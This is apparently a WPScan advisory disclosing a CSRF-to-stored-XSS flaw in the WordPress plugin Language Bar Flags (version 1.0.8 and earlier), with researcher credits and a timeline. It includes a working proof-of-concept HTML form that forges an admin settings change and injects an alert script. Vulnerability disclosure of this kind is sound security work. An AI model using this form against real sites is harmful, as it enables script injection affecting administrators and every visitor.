WordPress Plugin Vulnerabilities
Language Bar Flags <= 1.0.8 - CSRF to Stored XSS
Description
The plugin does not have any CSRF in place when saving its settings and did not sanitise or escape them when generating the flag bar in the frontend. This could allow attackers to make a logged in admin change the settings, and set Cross-Site Scripting payload in them, which will be executed in the frontend for all users
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=langbf" method="POST">
<input type="hidden" name="options_update" value="1" />
<input type="hidden" name="langbf_active" value="yes" />
<input type="hidden" name="langbf_title" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="langbf_position" value="top" />
<input type="hidden" name="langbf_side" value="left" />
<input type="hidden" name="langbf_disable_wpbar" value="yes" />
<input type="hidden" name="langbf_new_window" value="no" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Then view the homepage of the blog to trigger the XSS
Affects Plugins
No known fix References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vinay Bhuria
Submitter
Vinay Bhuria
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-16 (about 2 years ago)
Added
2021-08-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 